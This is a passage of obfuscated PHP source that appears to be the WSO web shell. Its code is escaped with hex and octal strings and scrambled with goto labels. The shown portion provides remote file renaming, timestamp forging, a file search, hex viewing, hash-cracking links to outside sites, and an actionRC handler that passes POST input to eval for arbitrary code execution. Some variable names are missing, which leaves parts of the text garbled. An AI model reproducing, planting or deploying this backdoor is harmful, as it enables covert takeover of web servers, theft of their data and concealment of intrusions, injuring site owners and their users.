10: $h[2] .= "\40"; break; case 13: $h[2] .= "\40"; break; default: $h[2] .= $c[$i]; break; } $n++; if ($n == 32) { $n = 0; if ($i + 1 < $len) { $h[0] .= sprintf("\45\60\x38\x58", $i + 1) . "\74\x62\x72\76"; } $h[1] .= "\x3c\142\x72\x3e"; $h[2] .= "\xa"; } } echo "\74\x74\141\x62\x6c\x65\x20\143\x65\154\154\x73\x70\141\x63\x69\x6e\147\75\61\40\143\x65\x6c\x6c\160\141\144\144\151\x6e\147\75\x35\40\x62\x67\143\157\x6c\157\162\75\43\62\x32\x32\x3e\74\x74\x72\76\x3c\x74\x64\x20\x62\147\x63\157\x6c\157\x72\x3d\43\x32\60\x32\70\63\62\76\x3c\x73\x70\x61\156\x20\163\x74\x79\154\x65\75\42\146\x6f\156\164\55\167\145\151\x67\150\164\x3a\x20\x6e\157\162\155\x61\154\x3b\42\76\74\160\x72\145\x3e" . $h[0] . "\x3c\57\160\162\x65\x3e\74\57\x73\160\x61\156\76\x3c\57\x74\144\x3e\74\x74\144\x20\142\x67\143\x6f\154\157\x72\x3d\x23\60\66\60\x61\x31\60\76\74\160\x72\145\x3e" . $h[1] . "\x3c\57\x70\x72\145\76\x3c\57\x74\x64\x3e\x3c\x74\144\40\x62\x67\x63\x6f\154\x6f\162\x3d\x23\62\x30\62\70\x33\x32\76\74\x70\x72\x65\x3e" . htmlspecialchars($h[2]) . "\74\x2f\160\x72\145\x3e\x3c\57\x74\x64\76\74\x2f\164\x72\x3e\x3c\x2f\x74\x61\x62\x6c\145\x3e"; break; case "\162\x65\x6e\141\155\145": if (!empty($_POST["\x70\63"])) { if (!@rename($_POST["\x70\x31"], $_POST["\160\x33"])) { echo "\x43\141\156\x27\164\x20\x72\x65\156\141\x6d\145\x21\x3c\x62\162\76"; } else { die("\74\163\x63\162\151\x70\164\x3e\147\50\156\165\154\x6c\54\x6e\x75\x6c\154\54\x22" . urlencode($_POST["\160\x33"]) . "\42\54\156\165\x6c\154\x2c\x22\42\51\x3c\x2f\x73\143\162\151\x70\x74\x3e"); } } echo "\x3c\x66\x6f\x72\155\x20\157\x6e\x73\165\x62\155\x69\164\75\x22\147\x28\x6e\x75\154\154\54\x6e\x75\154\154\54\47" . urlencode($_POST["\x70\x31"]) . "\47\x2c\x6e\165\x6c\x6c\x2c\164\x68\x69\x73\x2e\x6e\141\155\145\56\x76\x61\x6c\165\x65\x29\x3b\162\x65\x74\x75\x72\156\40\146\141\154\163\145\x3b\x22\76\74\151\x6e\x70\x75\x74\40\x74\171\160\145\x3d\x74\145\170\164\x20\x6e\141\x6d\145\x3d\156\x61\x6d\145\x20\x76\x61\x6c\x75\x65\x3d\42" . htmlspecialchars($_POST["\160\61"]) . "\42\x3e\x3c\151\x6e\x70\165\x74\40\x74\171\x70\x65\x3d\163\x75\x62\x6d\151\164\40\166\x61\154\165\145\75\42\x73\x75\x62\x6d\x69\x74\x22\x3e\x3c\57\146\157\x72\x6d\x3e"; break; case "\164\157\165\143\150": if (!empty($_POST["\x70\63"])) { $time = strtotime($_POST["\x70\63"]); if ($time) { if (!touch($_POST["\160\x31"], $time, $time)) { echo "\x46\x61\151\x6c\41"; } else { echo "\x54\157\x75\143\x68\x65\144\41"; } } else { echo "\102\x61\x64\x20\x74\x69\x6d\x65\x20\146\x6f\x72\155\141\x74\x21"; } } clearstatcache(); echo "\x3c\163\x63\162\x69\x70\164\76\x70\x33\x5f\75\42\42\73\x3c\x2f\x73\x63\x72\151\x70\164\x3e\74\146\157\162\155\x20\x6f\156\163\x75\142\x6d\x69\x74\75\42\x67\50\156\165\154\x6c\54\x6e\x75\154\154\x2c\x27" . urlencode($_POST["\x70\x31"]) . "\x27\54\x6e\165\154\154\54\x74\x68\151\163\x2e\164\x6f\165\x63\150\56\166\141\154\x75\145\x29\x3b\162\x65\x74\x75\162\156\40\146\x61\x6c\163\x65\73\x22\x3e\x3c\151\156\x70\165\x74\x20\164\x79\x70\145\75\164\x65\x78\x74\x20\156\141\155\145\75\164\x6f\165\143\150\40\x76\x61\154\165\x65\x3d\42" . date("\131\55\x6d\55\144\40\x48\72\151\72\x73", @filemtime($_POST["\x70\x31"])) . "\42\76\74\151\156\x70\165\164\40\x74\171\x70\145\75\163\165\x62\x6d\151\x74\x20\x76\x61\x6c\x75\x65\75\x22\x73\165\x62\x6d\151\x74\42\x3e\x3c\57\146\x6f\x72\155\x3e"; break; case "\146\x72\141\155\145": $frameSrc = substr(htmlspecialchars($GLOBALS["\x63\167\144"]), strlen(htmlspecialchars($_SERVER["\104\117\103\125\x4d\x45\116\x54\x5f\x52\x4f\117\x54"]))); if ($frameSrc[0] != "\57") { $frameSrc = "\x2f" . $frameSrc; } if ($frameSrc[strlen($frameSrc) - 1] != "\57") { $frameSrc = $frameSrc . "\57"; } $frameSrc = $frameSrc . htmlspecialchars($_POST["\160\61"]); echo "\x3c\151\146\162\141\155\145\x20\x77\151\x64\x74\x68\75\x22\61\60\x30\45\x22\40\150\x65\x69\x67\x68\164\x3d\x22\x39\x30\60\x70\170\x22\x20\x73\143\162\157\x6c\154\x69\x6e\x67\x3d\x22\156\157\42\x20\x73\x72\x63\x3d" . $frameSrc . "\x20\x6f\x6e\154\x6f\141\144\x3d\42\157\x6e\x6c\157\x61\x64\x3d\150\x65\151\147\x68\x74\75\x63\x6f\156\164\x65\156\164\104\157\143\165\155\145\156\x74\x2e\x62\x6f\x64\x79\56\163\x63\x72\x6f\154\154\110\145\151\x67\150\164\42\76\74\x2f\x69\146\162\141\x6d\145\76"; break; } echo "\x3c\x2f\144\151\166\76"; hardFooter(); } goto XGk3X; wJWJM: if ($cwd[strlen($cwd) - 1] != "\x2f") { $cwd .= "\x2f"; } goto x892n; Bpag2: function actionStringTools() { if (!function_exists("\x68\145\x78\62\x62\x69\x6e")) { function hex2bin($p) { return decbin(hexdec($p)); } } if (!function_exists("\142\x69\156\150\145\170")) { function binhex($p) { return dechex(bindec($p)); } } if (!function_exists("\150\x65\x78\x32\141\x73\143\x69\151")) { function hex2ascii($p) { $r = ''; for ($i = 0; $i < strLen($p); $i += 2) { $r .= chr(hexdec($p[$i] . $p[$i + 1])); } return $r; } } if (!function_exists("\x61\163\x63\151\x69\x32\x68\x65\x78")) { function ascii2hex($p) { $r = ''; for ($i = 0; $i < strlen($p); ++$i) { $r .= sprintf("\45\x30\62\x58", ord($p[$i])); } return strtoupper($r); } } if (!function_exists("\146\165\x6c\x6c\137\165\x72\x6c\145\x6e\143\157\144\x65")) { function full_urlencode($p) { $r = ''; for ($i = 0; $i < strlen($p); ++$i) { $r .= "\x25" . dechex(ord($p[$i])); } return strtoupper($r); } } $stringTools = array("\102\141\163\145\x36\64\40\x65\x6e\143\x6f\x64\x65" => "\x62\141\x73\145\66\x34\x5f\x65\156\143\x6f\x64\x65", "\102\141\x73\x65\x36\x34\x20\x64\145\143\157\x64\145" => "\x62\x61\x73\145\x36\x34\x5f\x64\x65\x63\157\x64\145", "\125\x72\154\40\x65\156\x63\157\144\145" => "\165\162\154\x65\156\143\x6f\x64\145", "\125\x72\x6c\40\144\145\x63\x6f\144\x65" => "\x75\x72\x6c\144\x65\x63\157\x64\x65", "\x46\165\x6c\154\40\x75\162\x6c\145\x6e\x63\157\x64\145" => "\x66\x75\154\154\137\x75\x72\154\x65\x6e\x63\157\x64\145", "\x6d\144\x35\40\x68\141\163\150" => "\x6d\144\65", "\163\x68\x61\x31\40\150\x61\x73\150" => "\163\x68\x61\x31", "\143\162\171\160\164" => "\x63\x72\x79\x70\x74", "\x43\x52\103\x33\62" => "\143\x72\143\63\62", "\101\123\x43\x49\x49\x20\x74\157\x20\110\105\130" => "\141\x73\x63\x69\x69\62\x68\x65\170", "\110\x45\x58\x20\164\x6f\40\x41\123\x43\111\111" => "\150\145\170\62\141\x73\x63\x69\151", "\x48\105\x58\40\x74\x6f\40\x44\105\x43" => "\x68\x65\170\144\x65\x63", "\110\105\x58\x20\x74\x6f\40\x42\x49\116" => "\x68\x65\170\62\x62\151\156", "\x44\x45\x43\x20\164\157\40\x48\105\x58" => "\x64\x65\x63\150\x65\170", "\x44\105\x43\40\x74\157\40\102\111\116" => "\x64\x65\143\142\x69\156", "\x42\x49\x4e\40\164\x6f\x20\x48\x45\x58" => "\142\x69\156\x68\x65\170", "\102\111\x4e\40\x74\157\x20\104\x45\103" => "\x62\151\x6e\144\145\143", "\x53\164\162\x69\x6e\147\40\164\157\40\x6c\157\x77\x65\x72\x20\x63\141\x73\145" => "\x73\164\162\164\x6f\x6c\157\167\x65\162", "\123\x74\x72\x69\x6e\x67\x20\x74\x6f\x20\x75\160\160\x65\162\x20\143\x61\163\145" => "\163\x74\x72\164\x6f\165\x70\x70\145\162", "\x48\164\x6d\x6c\x73\x70\x65\x63\x69\141\154\x63\150\141\x72\163" => "\150\x74\155\154\163\x70\x65\x63\151\141\x6c\x63\x68\x61\162\x73", "\x53\x74\x72\151\x6e\x67\40\154\x65\156\x67\x74\150" => "\163\x74\x72\154\145\156"); if (isset($_POST["\141\152\x61\x78"])) { prototype(md5($_SERVER["\110\124\x54\x50\x5f\110\x4f\123\x54"]) . "\x61\x6a\141\170", true); ob_start(); if (in_array($_POST["\160\x31"], $stringTools)) { echo $_POST["\160\x31"]($_POST["\160\x32"]); } $temp = "\144\157\143\x75\155\x65\x6e\164\x2e\x67\145\164\105\x6c\145\x6d\x65\156\164\102\171\111\144\50\47\163\164\x72\x4f\x75\164\160\x75\164\47\x29\56\163\164\x79\x6c\145\x2e\144\x69\x73\x70\x6c\x61\171\75\47\x27\73\144\157\x63\165\155\145\156\164\x2e\x67\x65\x74\x45\154\145\155\145\x6e\x74\102\171\x49\144\50\x27\163\x74\x72\117\165\x74\x70\x75\164\x27\x29\56\x69\x6e\156\x65\162\x48\124\x4d\x4c\75\x27" . addcslashes(htmlspecialchars(ob_get_clean()), "\12\xd\x9\134\x27\x0") . "\47\x3b\12"; echo strlen($temp), "\xa", $temp; die; } if (empty($_POST["\141\x6a\141\170"]) && !empty($_POST["\160\x31"])) { prototype(md5($_SERVER["\x48\x54\x54\120\x5f\x48\x4f\x53\124"]) . "\x61\x6a\141\170", 0); } hardHeader(); echo "\74\150\x31\x3e\x53\x74\x72\151\156\147\x20\143\x6f\x6e\166\145\x72\163\x69\157\x6e\x73\74\57\150\61\x3e\74\144\151\166\x20\x63\154\x61\163\x73\x3d\x63\157\x6e\x74\145\156\164\x3e"; echo "\x3c\146\x6f\162\155\x20\156\x61\x6d\x65\75\47\164\x6f\x6f\154\163\x46\x6f\162\x6d\47\x20\157\156\123\x75\142\155\x69\164\x3d\47\151\146\x28\x74\150\151\163\x2e\x61\x6a\141\x78\56\143\x68\145\x63\x6b\x65\x64\51\x7b\141\50\156\165\154\x6c\x2c\x6e\165\x6c\x6c\54\164\x68\151\x73\56\163\145\x6c\x65\x63\164\x54\x6f\157\154\56\x76\141\x6c\165\x65\x2c\164\150\151\x73\56\x69\156\160\165\x74\x2e\166\141\154\x75\x65\51\73\175\145\154\x73\145\173\x67\x28\156\x75\x6c\x6c\x2c\x6e\x75\x6c\154\x2c\164\x68\151\x73\x2e\x73\x65\154\x65\143\164\124\x6f\157\154\56\166\141\154\x75\x65\54\164\150\x69\163\x2e\151\x6e\x70\x75\164\56\166\141\154\165\145\x29\73\175\x20\x72\x65\164\x75\162\156\40\146\141\x6c\x73\x65\73\x27\x3e\x3c\154\141\142\145\x6c\76\x3c\x73\145\x6c\145\143\164\40\156\141\155\x65\75\47\163\x65\154\x65\x63\x74\124\x6f\157\x6c\47\76"; foreach ($stringTools as $k => $v) { echo "\74\x6f\x70\x74\x69\x6f\x6e\x20\166\141\154\x75\145\75\x27" . htmlspecialchars($v) . "\47\x3e" . $k . "\x3c\57\x6f\160\x74\151\x6f\156\76"; } echo "\x3c\57\x73\x65\154\145\143\x74\76\x3c\x2f\154\141\142\x65\x6c\x3e\x3c\x69\x6e\160\165\164\x20\x74\171\x70\x65\x3d\47\x73\165\142\x6d\151\x74\47\40\x76\141\x6c\165\145\x3d\x27\163\x75\x62\x6d\x69\164\x27\57\x3e\x20\74\x69\156\160\165\x74\x20\x74\171\x70\x65\x3d\143\150\x65\x63\153\142\157\170\x20\156\141\155\145\x3d\141\152\141\x78\40\x76\x61\x6c\x75\x65\75\x31\x20" . (@$_COOKIE[md5($_SERVER["\x48\x54\124\120\137\x48\x4f\x53\124"]) . "\x61\x6a\x61\170"] ? "\x63\150\145\x63\x6b\145\x64" : '') . "\76\40\163\145\156\144\x20\x75\x73\x69\156\147\40\101\x4a\x41\x58\x3c\142\162\x3e\74\164\145\x78\x74\x61\162\x65\x61\40\x6e\x61\x6d\145\x3d\47\x69\x6e\160\165\x74\x27\x20\x73\164\x79\x6c\x65\75\x27\155\141\162\147\x69\x6e\x2d\164\157\x70\x3a\x35\x70\x78\x27\40\x63\x6c\141\x73\x73\x3d\x62\151\147\x61\162\x65\x61\x3e" . (empty($_POST["\160\61"]) ? '' : htmlspecialchars(@$_POST["\160\62"])) . "\x3c\57\164\x65\170\164\141\x72\145\x61\x3e\x3c\57\x66\x6f\x72\155\x3e\x3c\160\162\x65\40\143\154\141\163\163\75\47\155\154\61\47\x20\x73\x74\x79\154\x65\75\47" . (empty($_POST["\160\61"]) ? "\144\151\x73\x70\x6c\141\171\x3a\x6e\157\156\145\73" : '') . "\155\141\x72\147\x69\156\x2d\x74\x6f\x70\x3a\65\x70\170\47\x20\151\x64\75\47\x73\164\162\x4f\x75\164\160\x75\x74\47\76"; if (!empty($_POST["\x70\x31"])) { if (in_array($_POST["\x70\61"], $stringTools)) { echo htmlspecialchars($_POST["\x70\61"]($_POST["\x70\62"])); } } echo "\74\x2f\x70\162\145\76\x3c\57\144\x69\166\x3e\x3c\142\162\x3e\x3c\150\61\76\123\x65\141\x72\x63\x68\x20\146\151\x6c\x65\163\72\74\57\x68\61\x3e\x3c\x64\x69\166\x20\x63\x6c\x61\163\x73\75\143\x6f\x6e\x74\145\x6e\x74\x3e\12\x9\x9\x3c\146\157\162\x6d\x20\157\156\x73\165\x62\155\x69\164\x3d\x22\147\50\x6e\x75\154\154\54\164\x68\x69\163\x2e\x63\167\x64\56\x76\141\154\x75\x65\x2c\156\165\154\x6c\54\x74\150\x69\x73\56\x74\145\x78\x74\x2e\x76\141\154\x75\x65\54\x74\150\x69\x73\x2e\x66\151\154\x65\x6e\141\x6d\145\56\166\141\x6c\165\x65\51\73\162\145\164\x75\x72\156\x20\x66\141\154\163\x65\x3b\42\x3e\74\x74\x61\x62\x6c\145\40\143\145\x6c\154\x70\x61\x64\x64\x69\x6e\147\x3d\x27\61\x27\x20\x63\145\x6c\x6c\x73\x70\141\x63\151\x6e\147\75\47\60\47\x20\167\x69\x64\164\150\75\x27\65\x30\45\x27\x3e\12\11\11\x9\74\164\x72\76\x3c\164\x64\40\x77\x69\144\164\x68\x3d\x27\x31\45\x27\x3e\124\x65\170\164\72\74\57\164\x64\x3e\x3c\164\x64\76\74\x69\x6e\160\x75\164\40\x74\x79\x70\x65\x3d\47\164\x65\170\x74\x27\40\x6e\141\x6d\145\75\47\164\145\x78\x74\47\x20\x73\164\171\x6c\x65\75\x27\167\x69\x64\x74\x68\72\61\60\x30\x25\x27\x3e\x3c\x2f\164\144\x3e\74\57\164\x72\x3e\xa\x9\x9\x9\74\164\162\x3e\74\164\144\x3e\120\x61\x74\x68\x3a\x3c\57\164\144\76\74\164\x64\x3e\74\x69\156\x70\x75\164\40\164\171\160\x65\x3d\x27\164\145\x78\164\x27\x20\x6e\141\x6d\x65\75\47\x63\x77\x64\47\40\166\141\x6c\x75\145\75\x27" . htmlspecialchars($GLOBALS["\143\167\144"]) . "\47\x20\x73\164\171\154\145\x3d\x27\167\x69\x64\164\150\x3a\x31\60\60\45\47\x3e\x3c\x2f\x74\x64\x3e\74\57\164\x72\x3e\12\11\11\x9\74\164\162\76\x3c\x74\144\76\116\x61\155\145\72\x3c\57\164\x64\76\x3c\x74\x64\76\74\151\x6e\x70\165\164\x20\x74\171\160\145\75\47\164\145\x78\x74\47\x20\156\141\155\145\x3d\47\x66\151\154\x65\156\x61\x6d\145\47\40\x76\x61\x6c\165\145\x3d\x27\x2a\47\x20\x73\x74\x79\x6c\x65\x3d\x27\167\x69\144\x74\150\x3a\x31\60\x30\45\x27\x3e\x3c\57\164\144\x3e\x3c\57\x74\x72\76\xa\11\x9\x9\74\164\162\76\74\164\144\x3e\x3c\57\164\x64\76\74\164\x64\76\x3c\151\156\x70\165\x74\x20\164\171\160\145\x3d\x27\x73\165\x62\x6d\151\164\x27\x20\166\x61\x6c\165\x65\x3d\47\x73\165\x62\155\151\164\x27\76\74\57\x74\x64\x3e\x3c\57\164\162\x3e\xa\11\11\x9\x3c\57\164\x61\142\x6c\x65\76\74\x2f\x66\x6f\162\x6d\76"; function hardRecursiveGlob($path) { if (substr($path, -1) != "\57") { $path .= "\x2f"; } $paths = @array_unique(@array_merge(@glob($path . $_POST["\x70\63"]), @glob($path . "\x2a", GLOB_ONLYDIR))); if (is_array($paths) && @count($paths)) { foreach ($paths as $) { if (@is_dir($)) { if ($path != $) { hardRecursiveGlob($); } } else { if (empty($_POST["\x70\62"]) || @strpos(file_get_contents($), $_POST["\x70\62"]) !== false) { echo "\74\141\40\x68\162\145\x66\75\x27\x23\x27\x20\x6f\156\x63\x6c\x69\143\x6b\75\47\147\x28\x22\x46\151\154\x65\163\x54\157\157\154\163\x22\54\x6e\165\154\154\x2c\42" . urlencode($) . "\x22\54\40\42\x76\151\x65\x77\42\x2c\x22\x22\x29\x27\x3e" . htmlspecialchars($) . "\x3c\57\x61\x3e\x3c\x62\x72\76"; } } } } } if (@$_POST["\x70\x33"]) { hardRecursiveGlob($_POST["\x63"]); } echo "\74\57\144\x69\x76\76\x3c\x62\x72\x3e\x3c\150\61\x3e\x53\145\141\162\143\x68\40\146\157\162\40\150\x61\x73\150\x3a\x3c\x2f\x68\x31\x3e\x3c\x64\151\x76\40\x63\154\141\163\163\75\143\x6f\156\164\x65\156\x74\76\xa\x9\x9\x3c\x66\x6f\x72\155\x20\155\x65\164\150\157\x64\75\x27\160\x6f\x73\164\47\40\x74\141\x72\147\145\164\x3d\47\137\x62\x6c\141\156\153\x27\x20\156\141\x6d\x65\75\x27\150\146\x27\76\12\x9\x9\x9\74\151\x6e\160\x75\x74\x20\164\x79\160\x65\x3d\47\164\145\170\164\x27\40\x6e\141\x6d\x65\75\x27\150\x61\163\150\x27\x20\x73\x74\171\154\145\75\47\167\151\x64\164\150\72\x32\60\60\x70\x78\x3b\47\76\x3c\x62\162\76\12\40\40\x20\x20\x20\40\40\40\x20\40\40\40\x3c\x69\x6e\160\x75\x74\x20\x74\171\160\145\x3d\x27\150\x69\144\144\145\x6e\47\40\x6e\141\155\145\75\47\x61\143\164\47\x20\x76\141\x6c\165\x65\x3d\47\x66\151\156\144\47\57\x3e\12\x9\11\11\x3c\x69\x6e\x70\165\x74\40\164\x79\160\x65\75\x27\163\165\x62\x6d\151\164\x27\x20\x76\141\154\x75\x65\75\47\150\141\163\x68\x63\x72\x61\x63\x6b\151\156\147\x2e\162\x75\x27\x20\157\156\x63\154\x69\x63\x6b\75\x22\144\x6f\x63\165\155\145\x6e\164\56\150\146\x2e\141\x63\x74\151\x6f\x6e\x3d\x27\x68\164\x74\x70\163\x3a\57\x2f\150\x61\163\x68\x63\x72\141\x63\x6b\151\156\x67\x2e\162\x75\x2f\x69\x6e\144\145\x78\56\x70\150\x70\47\x3b\144\157\x63\165\x6d\145\x6e\164\56\150\146\x2e\x73\x75\x62\155\x69\x74\x28\x29\42\76\x3c\142\x72\x3e\12\x9\11\11\74\151\x6e\x70\x75\x74\40\164\171\x70\145\75\47\163\x75\x62\x6d\151\x74\x27\x20\166\x61\x6c\165\x65\x3d\x27\155\x64\x35\x2e\162\145\144\156\157\x69\172\145\x2e\143\157\155\47\40\157\156\x63\154\x69\x63\153\x3d\x22\x64\157\143\x75\155\x65\156\x74\56\x68\146\x2e\x61\143\x74\151\157\x6e\x3d\47\x68\164\164\160\72\x2f\x2f\x6d\x64\65\56\162\x65\x64\156\157\x69\172\x65\x2e\143\157\155\57\77\x71\75\47\x2b\x64\x6f\143\165\155\145\156\x74\56\x68\146\56\x68\x61\163\150\56\166\141\x6c\x75\x65\x2b\x27\46\163\75\155\x64\65\47\73\144\x6f\143\x75\x6d\145\156\x74\56\x68\146\56\x73\x75\x62\155\151\164\50\51\x22\x3e\x3c\142\x72\x3e\xa\40\40\40\40\40\40\x20\x20\x20\x20\40\40\74\151\x6e\160\165\164\40\164\171\x70\145\x3d\x27\x73\x75\x62\x6d\x69\x74\47\x20\166\141\154\165\x65\75\x27\x66\x61\x6b\145\x6e\141\155\x65\x67\145\156\145\162\141\x74\157\x72\x2e\x63\x6f\x6d\x27\40\157\156\x63\154\151\x63\153\75\42\144\x6f\143\165\155\x65\x6e\x74\x2e\x68\x66\x2e\x61\143\x74\151\157\156\x3d\47\x68\x74\x74\x70\72\57\57\167\x77\167\56\x66\x61\153\145\x6e\x61\155\x65\x67\145\x6e\145\162\x61\x74\157\162\x2e\x63\157\x6d\x2f\47\x3b\144\x6f\x63\165\x6d\145\x6e\164\56\x68\x66\56\x73\x75\142\155\151\164\x28\51\x22\x3e\x3c\x62\162\76\12\11\x9\x9\74\x69\156\160\x75\164\x20\164\x79\160\145\75\x27\x73\165\x62\x6d\x69\164\x27\40\x76\x61\x6c\165\145\75\x27\x68\x61\x73\x68\x63\162\x61\x63\x6b\56\x63\x6f\155\47\x20\x6f\156\143\154\x69\x63\153\x3d\x22\x64\x6f\143\165\155\145\156\164\x2e\150\x66\x2e\x61\x63\164\x69\x6f\x6e\75\x27\x68\164\x74\x70\72\57\x2f\167\167\x77\56\150\x61\163\x68\143\162\x61\x63\153\x2e\x63\157\x6d\57\151\156\x64\145\170\56\x70\x68\x70\x27\x3b\x64\x6f\x63\165\155\x65\x6e\164\56\150\146\56\163\165\x62\x6d\151\164\x28\x29\x22\76\x3c\x62\162\76\xa\x9\x9\x9\74\151\x6e\160\x75\x74\x20\164\171\160\145\75\47\163\165\x62\x6d\151\x74\47\x20\166\141\x6c\165\145\x3d\47\x74\x6f\157\x6c\x6b\151\x2e\143\x6f\x6d\47\x20\157\x6e\143\x6c\x69\143\x6b\75\x22\144\x6f\x63\165\155\x65\156\x74\x2e\x68\146\x2e\x61\143\x74\151\157\x6e\75\x27\150\164\x74\160\72\x2f\x2f\x74\157\157\154\153\x69\x2e\x63\x6f\155\x2f\x27\73\144\157\143\165\x6d\145\x6e\164\x2e\x68\146\56\x73\165\142\x6d\x69\x74\x28\x29\x22\76\x3c\142\x72\x3e\12\11\x9\x9\x3c\x69\156\x70\x75\164\x20\x74\171\x70\x65\x3d\47\x73\x75\142\x6d\x69\x74\x27\x20\x76\141\x6c\x75\x65\75\47\x66\157\x70\x6f\56\143\157\x6d\56\141\162\47\40\x6f\x6e\x63\x6c\x69\x63\153\75\42\144\x6f\x63\165\155\x65\156\164\56\150\146\56\x61\143\x74\151\157\156\x3d\47\150\x74\x74\x70\x3a\x2f\x2f\x66\x6f\x70\x6f\x2e\x63\x6f\155\56\x61\162\57\47\73\x64\x6f\x63\165\x6d\145\x6e\x74\x2e\x68\146\56\x73\x75\142\x6d\151\164\50\51\x22\x3e\74\142\162\x3e\12\11\11\11\x3c\x69\156\160\x75\164\x20\164\171\160\145\x3d\x27\x73\165\x62\x6d\151\164\47\x20\x76\x61\x6c\165\x65\75\47\x6d\x64\65\144\x65\x63\x72\171\160\x74\145\162\56\x63\x6f\155\47\x20\x6f\x6e\143\x6c\151\143\x6b\x3d\x22\144\x6f\x63\165\155\x65\x6e\164\x2e\150\146\x2e\141\x63\164\151\157\x6e\x3d\x27\150\164\164\160\72\57\x2f\167\167\x77\x2e\155\144\x35\x64\x65\143\x72\x79\160\164\145\x72\56\x63\x6f\155\57\x27\x3b\144\x6f\x63\165\155\x65\156\x74\56\x68\x66\56\x73\165\x62\155\151\164\x28\x29\x22\76\74\142\x72\x3e\12\11\11\x3c\x2f\x66\157\x72\x6d\76\74\57\x64\151\166\x3e"; hardFooter(); } goto aQUM2; J_363: $home_cwd = @getcwd(); goto QdAU6; QdAU6: if (isset($_POST["\x63"])) { @chdir($_POST["\x63"]); } goto LarW_; PIzrX: if (!isset($_COOKIE[md5($_SERVER["\x48\124\124\120\137\x48\x4f\123\x54"]) . "\x6b\145\171"])) { prototype(md5($_SERVER["\110\x54\x54\120\137\x48\117\123\124"]) . "\153\145\171", $); } goto ewK8X; AH6j_: if (!$safe_mode) { error_reporting(0); } goto OUica; fgiAj: function actionRC() { if (!@$_POST["\160\x31"]) { $a = array("\x75\x6e\x61\x6d\x65" => php_uname(), "\160\x68\160\x5f\166\145\x72\x73\151\x6f\156" => phpversion(), "\126\105\x52\123\x49\117\x4e" => VERSION, "\163\141\146\x65\x6d\157\x64\145" => @ini_get("\163\x61\x66\145\137\155\157\144\145")); echo serialize($a); } else { eval($_POST["\160\61"]); } } goto MBmWc; Y5ImI: function viewPermsColor($f) { if (!@is_readable($f)) { return "\74\x66\157\x6e\x74\40\x63\x6f\154\157\162\x3d\x23\106\x46\x30\60\60\x30\76\x3c\x62\76" . perms(@fileperms($f)) . "\74\x2f\142\76\74\x2f\x66\x6f\156\164\x3e"; } elseif (!@is_writable($f)) { return "\74\x66\x6f\x6e\164\x20\x63\157\x6c\157\162\x3d\167\x68\151\x74\145\76\x3c\x62\76" . perms(@fileperms($f)) . "\74\57\142\x3e\74\x2f\146\157\x6e\x74\x3e"; } else { return "\74\x66\157\156\164\40\143\x6f\154\x6f\162\75\x23\106\106\104\102\65\x46\76\x3c\x62\x3e" . perms(@fileperms($f)) . "\x3c\57\x62\x3e\x3c\x2f\x66\x6f\156\x74\x3e"; } } goto n9j03; x892n: function hardHeader() { if (empty($_POST["\x63\150\x61\162\x73\x65\x74"])) { $_POST["\143\x68\x61\x72\163\145\x74"] = $GLOBALS["\xe2\x96\x9c"]; } echo "\74\150\164\155\154\76\74\150\145\141\144\76\x3c\155\x65\x74\x61\40\150\x74\x74\160\55\x65\161\x75\x69\x76\75\47\103\157\x6e\164\145\156\x74\x2d\124\x79\160\x65\47\40\143\157\156\164\x65\156\164\x3d\x27\164\x65\170\164\x2f\x68\164\155\x6c\x3b\x20\143\x68\x61\162\163\145\164\x3d" . $_POST["\x63\x68\141\x72\x73\x65\x74"] . "\47\x3e\74\x74\x69\x74\154\145\76" . $_SERVER["\110\x54\x54\120\x5f\x48\x4f\123\124"] . "\40\x2d\40\x57\123\117\40" . VERSION . "\x3c\57\x74\x69\164\154\x65\76\12\x3c\x73\x74\x79\154\145\x3e\12\11\142\157\144\x79\x20\173\x62\141\x63\153\x67\162\x6f\165\x6e\x64\x2d\143\x6f\154\157\x72\x3a\x23\60\x36\x30\101\61\x30\73\x20\x63\x6f\x6c\x6f\162\x3a\x23\145\61\145\x31\145\x31\73\40\155\141\x72\x67\151\156\x3a\x30\73\40\x66\157\156\164\72\x6e\157\162\155\141\154\40\x37\x35\45\40\x41\162\151\141\154\x2c\x20\110\145\x6c\166\x65\x74\x69\x63\141\54\x20\x73\141\x6e\163\x2d\x73\145\162\x69\146\x3b\x20\x7d\x20\143\x61\x6e\x76\141\x73\x7b\40\144\151\x73\160\x6c\x61\x79\x3a\40\142\154\157\x63\x6b\x3b\40\x76\x65\x72\164\151\143\141\x6c\55\141\x6c\x69\x67\x6e\x3a\x20\142\x6f\164\x74\x6f\155\x3b\175\12\11\43\160\x61\x72\164\151\143\x6c\145\x73\55\x6a\163\173\x77\151\x64\164\x68\72\x20\x31\x30\60\x25\x3b\x20\x68\145\x69\147\150\164\72\x20\61\x30\60\x70\170\x3b\x20\x62\x61\x63\x6b\147\162\157\165\156\x64\55\143\x6f\154\157\162\72\x20\43\x30\x36\60\141\61\x30\73\x20\142\x61\x63\x6b\147\x72\x6f\165\x6e\x64\x2d\x69\155\141\x67\145\72\40\x75\x72\154\50\47\x27\x29\73\x20\x62\141\x63\x6b\x67\162\157\165\x6e\x64\55\162\145\x70\x65\x61\164\x3a\x20\x6e\157\55\x72\145\160\x65\x61\164\73\40\142\x61\x63\153\147\x72\x6f\165\156\144\55\x73\151\x7a\x65\x3a\40\x63\x6f\166\x65\x72\73\40\x62\141\143\x6b\147\x72\x6f\165\x6e\144\x2d\160\x6f\163\151\x74\x69\x6f\156\x3a\x20\65\60\x25\40\x35\x30\x25\73\x7d\12\11\142\157\144\x79\x2c\x74\144\54\164\x68\x9\173\x66\157\156\x74\x3a\x31\x30\160\x74\40\x74\x61\150\x6f\x6d\141\54\141\162\151\141\x6c\54\x76\x65\x72\x64\141\156\141\x2c\163\x61\156\163\x2d\163\x65\x72\151\146\54\x4c\165\x63\151\144\141\40\x53\141\156\x73\73\x6d\x61\x72\x67\x69\156\72\60\73\166\145\x72\x74\151\x63\x61\154\55\141\x6c\151\x67\156\72\164\x6f\x70\73\175\12\11\164\141\x62\x6c\x65\x2e\151\156\146\x6f\11\x7b\143\157\x6c\157\x72\x3a\x23\x43\63\x43\x33\103\63\x3b\x7d\xa\11\164\141\x62\x6c\145\43\x74\x6f\157\154\163\x54\x62\x6c\x20\x7b\142\x61\x63\x6b\147\162\157\165\156\x64\55\x63\157\154\157\x72\72\40\x23\60\66\60\101\x31\60\x3b\x7d\12\x9\x73\x70\141\156\x2c\x68\61\x2c\141\11\x7b\143\x6f\154\x6f\x72\72\43\x66\146\x66\40\x21\151\155\160\x6f\162\x74\141\x6e\x74\73\175\12\11\163\160\x61\156\x9\x9\173\x66\157\x6e\x74\x2d\167\x65\151\x67\150\164\x3a\142\x6f\154\x64\x65\x72\x3b\x7d\12\x9